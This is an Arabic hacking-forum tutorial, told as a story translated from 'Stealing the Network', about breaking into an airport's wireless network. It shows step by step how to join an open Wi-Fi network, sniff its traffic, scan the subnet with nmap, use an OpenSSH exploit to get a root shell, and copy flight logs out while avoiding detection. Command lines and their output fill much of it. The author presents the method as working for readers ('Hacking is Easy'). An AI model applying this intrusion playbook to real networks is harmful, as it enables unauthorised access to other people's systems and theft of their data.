اختراق الشبكات الاسلكية5(Story)

عام 0 geek4arab
Spread the love
0
(0)

 

 

السلام عليكم …
حمل الملف الاتي لاستزادة حول موضوع لاقطات الاشارة ..

من هنا

حمل ملف عمل الستالايت لاقط الاشارة للشبكات الاسلكية (عيش بهل النعم)

من هنا

اليوم سوف اتكلم عن اجمل الامور في نظري الا وهو تعقب الاثر والاخذ بالثار

صراحة اذا تم اختراق موقعك او شبكتك او حتى جهازك هذ ايدل على ضعف من الجانب الوقائي من جهتك لكم الجميل ان تعرف ماذا فعل المخترق لكي يتمكن منك والاجمل انك ترد عليه هجومه .. لتريه مدى ضعفه وان اختراقه لك لم يكون الابسبب اهمال منك وليس ضعف ..

(احييك اخي الماحي Ma7I على فكرة عمل الدروس كتاب لكن ان نفذتها اريد منك تصحيح الاخطاء الملائية وذلك بسبب العجلة في الكتابة)

صراحة سوف اجعل هذا الدرس كسيناريو

لاني كنت صراحة عاوز اشرح السناريوهات المحتملة بهجمات الـ WarDriving بس قلت لنفسي اخليها لاخي بلاك .. بماانه قال سوف يشرحها

السيناريو الاول مترجم من كتاب Syngress.-.Stealing.the.Network.How.to.Own.the.Box

والثاني خيالي بحت …

الاول مترجم

نبدا …

اذا هاانا ثانية في المطار. في انتظار الرحلة القادمة يجب علي استعمال الطيران لكي اقابل صديقتي ومن كثر سفري عبر هذه الخطوط اصبح موظف الاستقبال يعرفني وكلما راني يهز راسه مبتسما
وانا في طريقي الى الطائرة مشيت من خلال ممر ضيق وعيوني تنظر من خلال الزجاج الى مكان لارتاح فيه الى ان ياتي وقت لرحلتي توجهت الى نافذة تطل على المدرج وجلست على كرسي كان مغطى بقماش ابيض ..
بهدوء سحب جهازي المحمول (الابتوب) من الشنطة
كان نظامي W2K على حاسوبي وكنت انظر حولي الىل الاشخاص الذين يضيعون وقتهم اما في قراءة الصحف او شرب القهوة لامضاء الوقت وكان في اسفل المدرج الذي انا جالس فيه رجل عجوز كان نائما وفمه مفتوح
كنت استغرب من هؤلاء الاشخاص الذين يقتولن وقتهم في اشياء غير مفيدة … انا على عكسهم تماما حتاج شئ ليملئ وقت الفراغ لذلك قمت بتشغيل الحاسوب والاتصال بالانترنت
الشكبات الاسلكية عظيمة خلصتنا من الارتباط بطول معين او حد معين اينما كنت شبك مع الانترنت
اينما كنت في السيارة على الشاطئ في العمل في الاحياء في الشقق في المطاعم في النزل السكنية والجامعات الانترنت معاك
مع اني مستغرب انه واحد جالس في ماكدونالد وهو عم ياكل الهامبرجر وفاتح حاسبه النقال والدهن عم يغطي لوحة المفاتييح (شغلة روعة)
على كل حال انا مرتاح ومتمدد على كراسي الانتظار وخطرت ببالي فكرة ان اخترق شبكة المطار ..
وبدات العمل .. (كل هذا الي فوق علاك مصدي هون المهم)

في البداية شغلت برنامج Network Stumbler لكي التقط اي نقاط اتصال او اي شكبات لاسلكية في الجوار
مقطة الاتصال الوحيدة التي ظهرت لي هي شبكة المطار .. عادة تتفاوت الحمايات بين الشركات الكبيرة والصغيرة في الحماية والتامين على الشبكة
مع برنامج NetStumbler, استطيع ان اعرف عناوين الـ MAC address للشبكة معيرف الخدمة SSID القناة الي شغالة عليها الشبكة نوع نقطة الاتصال هل هناك تشفير ام لا وغيرها الكثير (كله مشروح في دروس سابقة)

المهم لاقطت شبكة واحدة وكانت من النوع غير المشفر ..
للتوضيح انظرالصورة الاتية

 

 

 

 

عادة تستعمل تقنية التشفير WEP Wired Equivalent Privacy في شبكات من معامرية 802.11b
على الرغم من وجود طرق عديدة لكسره الى ان خبراء الامن مازل يستعملونه
وطرق الهجوم عليه اما بالقواميس او الهجمات النشطة او السلبية (وقد شرحنا ادوات تكسر هذه النوع من التراميز سابقا كـWEPCrack و AirSnort )
من حسن حظي ان شبكة المطار لم تكن مشفرة لانه لو كانت مشفرة لم يكن لدي الوقت الكافي لسكر الحماية فلم يكن لدي اكثر من ساعة حتى يحين موعد سفري
بدون التشفير الـ WEP لايجب علي الا ان اعرف معرف الخدمة SSID لكي ادخل الشبكة ومعرف الخدمة ليس مخفي او انه باسورد (اذا لاحظت في برنامج نيتستمبر قلك شو هو)
الان يجب عليه تعديل الـ Configure تبع كرت الشبكة لدي في نظام W2K
انظر الى التعديلات لكي تفهم اكثر


 

 

في الخطوة التالية سوف اعطل مفاتيح التشفير لعدم وجودها في الشبكة المراد اختراقها
 


 

 

الان في حال كانت بروتكول DHCP مفعلا سوف اصبح داخل الشبكة فورا .. (رجاع درس الاخ سايلنت نيدل حول هذا الموضوع كيفية تفعيل هذا البروتكول ماهو كل شارحه الاخ في التفصيل بالمناسبة اوجه تحية لاخ سايلنت على جهوده معي من فترة قديمة لما كنت في بدايتي .. وقتها كان اسمي غير كذا عشان كده مش حيعرفني)
 


 

 

(ياحلاوته ياجماله والكونكشن 100%)
الان بعد الاتصال لم تظهر اي رسائل خطاء ..
الان خلينا نشوف هل انا اصحبت في الشبكة
شغلت محث الدوس ورحت كاتب الامر التالي

 

PHP CODE:
0001
0002
0003
0004
0005
0006
0007
0008
0009

</center>
C:>ipconfig
Windows 2000 IP Configuration
Ethernet adapter Wireless:
Connection-specific DNS Suffix . : host.atc.state.ca.us
IP Address. . . . . . . . . . . . : 192.168.1.103
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 192.168.1.1
 

</DIV>

 

جميل جدا (انا في الداخل)
 

PHP CODE:
0001
0002
0003
0004
0005
0006
0007
0008
0009
0010
0011

C:>ping www.grandideastudio.com
Pinging www.grandideastudio.com [216.127.70.89] with 32 bytes of data:
Reply from 216.127.70.89: bytes=32 time=80ms TTL=241
Reply from 216.127.70.89: bytes=32 time=70ms TTL=241
Reply from 216.127.70.89: bytes=32 time=70ms TTL=241
Reply from 216.127.70.89: bytes=32 time=80ms TTL=241
Ping statistics for 216.127.70.89:
Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
Minimum = 70ms, Maximum = 80ms, Average = 75ms
 

 

 

(من خلالكم اوجه تحية لمزود الخدمة السوري لمنعهم خدمة الـ ping وياريتها وقفت عليها شو بدي عدلكم لعدلكم … يجيلهم يوم من واحد كسلان)
الشئ الجميل اني لست فقط عضو في الشبكة بل حصلت على الانترنت عن طريق الشبكة
بعد الدخول لم اكتفي بهذا بل اصبح بداخلي هاجس لمعرفة ماهي المعطيات التي يتم ارسالها عبر هذه الشبكة
لذلك شغلت AiroPeek NX عبارة عن شاشة مراقبة للباكيت المرسلة عبر الشبكات الاسلكية (شنو كنا نسميه Sniifer)

مارايك بان ترى صورة للبرنامح وهو يعمل

 

 

 

 

وانا اراقب لاحظت ان شخصا قام بفتح خدمة الـ FTP (هنا برقت عيناي)

 

 

فكرت بان قد يكون اتصل بشبكة اخرى لست في مجالها او لنفرض انها شبكة لاسلكية وقلت لنفسي عن طريق الـ FTP اقدر ادخل عليها واكشف الشبكات كاملة
تركت السنيفر يعمل ليتلتقط المزيد
من جهازي ولان نظامي كان ويندوز شغلت Cygwin, عبارة عن يونكس شل وقررت معرفة الرينج الكامل للشبكة
وشغلت Nmap (شرحها اخوي B-Hunter شرح ولا اروع ترقوه في المنتدى) ونفذت الكوماند الاتي

 

 

PHP CODE:
0001
0002
0003
0004
0005
0006
0007
0008
0009
0010
0011
0012
0013
0014
0015
0016
0017
0018
0019
0020
0021
0022
0023
0024
0025
0026
0027
0028
0029
0030
0031
0032
0033
0034
0035
0036

bash-2.02$ nmap -sS -O -oN scan 192.168.*.*
bash-2.02$ cat scan
# nmap (V. 3.00) scan initiated Mon Mar 17 22:32:28 2003 as: nmap -sS
-O -oN scan 192.168.*.*
Interesting ports on SPANDEX (192.168.1.102):
(The 1595 ports scanned but not shown below are in state: closed)
Port State Service
135/tcp open loc-srv
139/tcp open netbios-ssn
445/tcp open microsoft-ds
1025/tcp open NFS-or-IIS
1026/tcp open LSA-or-nterm
1027/tcp open IIS
Remote OS guesses: Windows NT 5 Beta2 or Beta3, Windows Millennium
Edition (Me), Win 2000, or WinXP, MS Windows2000 Professional
RC1/W2K
Advance Server Beta3
Interesting ports on (192.168.1.109):
(The 1588 ports scanned but not shown below are in state: closed)
Port State Service
21/tcp open ftp
22/tcp open ssh
25/tcp open smtp
53/tcp open domain
80/tcp open http
110/tcp open pop-3
143/tcp open imap2
199/tcp open smux
443/tcp open https
993/tcp open imaps
995/tcp open pop3s
3306/tcp open mysql
5432/tcp open postgres
Uptime 35.940 days (since Mon Feb 10 00:12:59 2003)

?>

 

 

 

البوكس الاول الذي اكتشفته الاداة كان يحوي نظام ويندوز من الخدمات كان مبين ..
والبوكس الاخر اعتقدت انه مان لخدمات الميل والـ FTP وغيره لانه كل هذه الخدمات كانت مفتوحة …
ورايت بان المضيف الثاني يجدذبني اكثر بسب الخدمات الموجوده فيه .. لذلك ققرت البدء باللعبة
ورايت من الافضل ان اخترق البوكس الثاني واذا زاد لدي وقت ارجع للبوكس الاول
كان لدي استثمار لخدمة SSH تعطيك امتيازات الرووت لذلك قررت البدء فيها
 

 

 

 

 

 

 

 

 

PHP CODE:
0001
0002

<?php bash-2.02$ telnet 192.168.1.109 22
 

 

 

PHP CODE:
0001
0002
0003
0004
0005
0006
0007

Connecting To 192.168.1.109...
Escape character is ‘^]’.
SSH-2.0-OpenSSH_3.4  [CENTER] </center>
<center> </center>
<center> </center>
<center> </center>
?>

 

[/CENTER]

 

 

يالهي النسخة الموجودة كان فيها الخطاء وكانت عرضة للهجوم
 

 

 

 

 

 

 

PHP CODE:
0001
0002
0003
0004
0005
0006
0007
0008
0009
0010
0011

bash-2.02$ cd /gobbles
bash-2.02$ ./ssh –l root 192.168.1.109
[x] remote host supports ssh2
Protocol major version differ: 2 vs. 1[*] remote host supports ssh2[*] server_user: root:key[*] keyboard-interactive method available[*] chunk_size:4096 tcode_rep: 0 scode_rep 60[*] mode: exploitation
....PpppPppppPppPpPppPppPpppPppPpp. . .
*GOBBLE*
OpenBSD tux 4.0 GENERIC#94 i386
uid=0(root) gid=0(wheel) groups=0(wheel)
# whoami
root
 

 

 

اخذت # على السيرفر
بعد الحصول على الرروت قررت الحصول على ايع معلومات تفيدني وقرر ت معرفة لماذا كان يستخدمون هذا البوكس
قررت مشاهدة الـ log ..
 

PHP CODE:
0001
0002

# cat /tmp/dispatch.log
?>

 

 

 

 

 

PHP CODE:
0001
0002
0003
0004
0005
0006
0007
0008
0009
0010
0011
0012
0013
0014

DISPATCH LANDING REPORT
AIRPORT TIME
DATE FLIGHT DEPART ARRIVE DEPART ARRIVE AIRCRAFT MILES
MAR9 TRS498 FLL YYZ 21:43 0:01 T/B712/E 805
MAR9 MRA833 AVP YYZ 23:11 0:13 T/MD80/A 538
MAR9 SWA234 MHT YYZ 22:03 0:22 C208/G 73
MAR9 COA426 IAH YYZ 21:29 0:25 T/B737/R 1447
MAR9 DAL2120 CVG YYZ 23:00 0:31 T/E145/I 146
MAR9 AAL3170 BWI YYZ 22:27 0:43 T/B752/E 638
MAR9 BTA3490 BOS YYZ 0:02 0:46 T/B739/E 272
MAR9 USA618 ABQ YYZ 23:50 0:52 C208/A 126
MAR9 MTN7454 PHL YYZ 0:18 0:58 T/B733/R 250
 

 

 

 


كان الملف يبدوا مثيرا ,, كمنت الاى سجلات الطيران (كنت اتمتم يالي من فضولي)
قررت القاء نظرة على المحتوى طبعا لم افضل الدخول فورا عن طريق المتصفح http://192.168.1.109
للتفادي من الاكتشاف بملفات الـ log وغيرها
الناس تحب بطبيعة الحال ان تشيك كل فترة على ملفات الـ log
على الرغم ان طول فترة التصال بالشبكة كنت مجهول لااريد فعل حركة فيشك بي من يعرف قد اقرر الرجوع مرة اخرى
ضغطت الامور التي اريدها بضغط *.*tar ورفعتهم على الدليل /var/www/html ومنها رفعتهم على جهازي
سحبتهم عن طريق برنامج GuildFTPd في نظام ويندوز انه مجاني
وانا استعرض الملفات رايت صورة nondescript tmped0.gif وعيوني لم تصدق ماريت
هل هذا نوع من التحكم الالي بالطيران (سالت نفسي)
سمعت صوتا يقول
ايها السيدات والسادة جهزوا انفسكم للرحلة القادمة احملو بطاقتكم تاكدوا من جوازات السفر
اللعنة كنت اريد مشاهدة نظام الملاحة وحفظه عندي لكن لاسف ليس لدي الوقت للذلك حفظت الجهاز بوضعية hibernate mode, (حيث عندما تعيد تشغيل الجهاز يكون كما لو كان شغال يعني يحفظ لك كل العمليات الجارية)
سارعت بوضح المحمول في حقيبتي والصحيفة ايضا وانتقلت للركوب بالطائرة ..

السماء صديقة .. الامواج المنطلقة من الشبكات والاجهزة المحملة وغيرها على كل حال كرسي المغطى بالقماش الابيض ساعد على امضاء بعض الوقت المفيد …..

 

 

 

 

PHP CODE:
0001
0002
0003
0004
0005
0006
0007
0008
0009
0010
0011
0012
0013
0014
0015
0016
0017

References
1. Network Stumbler, http://www.netstumbler.com
2. S. Fluhrer, I. Mantin, and A. Shamir,“Weaknesses in the Key
Scheduling Algorithm of RC4,” Aug. 2001,
http://www.wisdom.weizmann.ac.il/~it...ers/Rc4_ksa.ps
3. N. Borisov, I. Goldberg, and D.Wagner, “(In)Security of the WEP
Algorithm,” www.isaac.cs.berkeley.edu/isaac/wep-faq.html
4. WEPCrack, http://wepcrack.sourceforge.net
5. AirSnort, http://airsnort.shmoo.com
6. WildPackets AiroPeek NX,
http://www.wildpackets.com/products/airopeek_nx
7. Cygwin, http://www.cygwin.com
8. Nmap, http://www.insecure.org/nmap
9. OpenSSH Challenge-Response Buffer Overflow Vulnerabilities,
http://www.securityfocus.com/bid/5093
10. GuildFTPd, http://www.guildftpd.com
?>

 

 

 

 

 


ارجو انكم تكونوا استفدتوا بتجربة عملية ..
صحيح القصة خيالية بس لو انك اتبعت الطريقة التالية ستجد نفسك مخترقا شبكة بل ومسيطر عليها ….
تنبيه انك دخلت للشبكة لس معناه انك سيطرت عليها .. يعني مثلك مثل اي عضو ليس له صلاحية ..

Hacking is Easy

I wanna send a Bigger greetZ to all My Frinds
Syrian Hacker ,, AlNary ,, B-Hunter

السيناريو الثاني تعقب الاثر .. اتركوني بس لكمل القصة على هدوء ورواء

شباب شيكوا على مشروع Snort-Wireless
www.snort-wireless.org
شوفوه وردولي خبر ..

اما عن الاسئلة التي تسال فسوف افتح لها موضوعا خاص عشان نجاوب عليها كلهااااااااااااا ….
مع انه الى الانالاسئلة التي سالت اجوبتها بين السطور …
بالنسبة للسوال الاول الذي طرح …
عناون الماك ادرس برنامج الـ NetStumber يطلعلك ياه … راجع درس الادوات .. واقراه كويس
اما اسوال الثاني بماانك قريب جدا من الشبكة لدرجة ان الكرت يلقطها فهذا يعني انك تعرف معرف الخدمة بتاع الشبكات الي انت لاقطها وعيش حياتك واذا لم ينفع عليك بالماك والقراءة الجيدة لهذه الدروس وغيرها …

تحياتي

Slacker

=================
 

لمناقشة الدرس في المنتدى
 

http://s4a.cc/forum/showthread.php?t=2330

How useful was this post?

Click on a star to rate it!

Average rating 0 / 5. Vote count: 0

No votes so far! Be the first to rate this post.

الكاتب geek4arab

geek4arab

مواضيع متعلقة

التعليقات مغلقة